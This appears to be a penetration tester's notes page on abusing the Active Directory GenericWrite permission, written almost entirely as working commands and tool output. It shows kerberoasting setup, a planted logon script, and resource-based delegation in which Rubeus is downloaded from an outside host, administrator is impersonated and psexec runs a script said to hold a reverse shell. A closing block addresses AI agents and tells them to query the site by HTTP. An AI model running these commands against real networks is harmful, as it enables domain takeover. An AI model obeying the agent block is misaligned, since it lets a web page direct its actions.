# GenericWrite ## User has GenericWrite over another user To abuse GenericWrite, we have 2 options. * We can set a service principal name and we can kerberoast that account. * We can set objects like logon script which would get executed on the next time account logs in. #### Setting SPN, ``` Import-Module .\Powerview.ps1 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword) Set-DomainObject -Credential $Cred -Identity maria -SET @{serviceprincipalname='foobar/xd'} ``` or by simply, ``` setspn -a object.local/maria.object.local:1337 object.local\maria ``` #### Changing logon script, ``` $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword) cd C:\\Windows\\System32\\spool\\drivers\\color echo 'whoami > C:\\Windows\\System32\\spool\\drivers\\color\\poc.txt' > foo.ps1 Set-DomainObject -Credential $Cred -Identity maria -SET @{scriptpath='C:\\Windows\\System32\\spool\\drivers\\color\\foo.ps1'} ``` ## User / Computer has GenericWrite over computer ### RBCD * ``` PS C:\users\administrator\Desktop> . .\Powermad.ps1 PS C:\users\administrator\Desktop> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) PS C:\users\administrator\Desktop> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" PS C:\users\administrator\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" PS C:\users\administrator\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength) PS C:\users\administrator\Desktop> $SD.GetBinaryForm($SDBytes, 0) PS C:\users\administrator\Desktop> Get-DomainComputer TARGET | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose VERBOSE: get-domain VERBOSE: [Get-DomainSearcher] ... PS C:\users\administrator\Desktop> curl 192.168.255.255/Rubeus.exe -o Rubeus.exe PS C:\users\administrator\Desktop> .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:TARGET.ECORP.COM ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.0 [*] Action: Calculate Password Hash(es) [*] Input password : Summer2018! [*] Input username : attackersystem [*] Input domain : ... [*] Salt : ... [*] rc4_hmac : [*] aes128_cts_hmac_sha1 : ... [*] aes256_cts_hmac_sha1 : ... [*] des_cbc_md5 : ... PS C:\users\administrator\Desktop> .\Rubeus.exe s4u /user:attackersystem$ /rc4: /impersonateuser:administrator /msdsspn:cifs/TARGET.ECORP.COM /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.0 [*] Action: S4U [*] Using rc4_hmac hash: [*] Building AS-REQ (w/ preauth) for: 'ECORP.COM\attackersystem$' [*] Using domain controller: 255.255.255.255:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIF... [*] Impersonating user 'administrator' to target SPN 'cifs/TARGET.ECORP.COM' [*] Building S4U2proxy request for service: 'cifs/TARGET.ECORP.COM' [*] Using domain controller: ... [*] Sending S4U2proxy request to domain controller .... [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN 'cifs/TARGET.ECORP.COM': ``` x.ps1 has a reverse shell ``` c:\Users\Administrator\Desktop> .\psexec -s \\TARGET.ECORP.COM Powershell -ExecutionPolicy Bypass -File c:\users\administrator\desktop\x.ps1 ``` or after setting up the domain object you can s4u2 proxy locally ``` net time set -S dc01.ecorp.local impacket-getST -spn cifs/dc01.ecorp.local ecorp/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip 192.168.xx.xx #export the ticket and do psexec to access the DC export KRB5CCNAME=./Administrator.ccache impacket-psexec -k -target-ip 192.168.xx.xx dc01.ecorp.local ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.morph3.blog/abusing-active-directory-acls/genericwrite.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.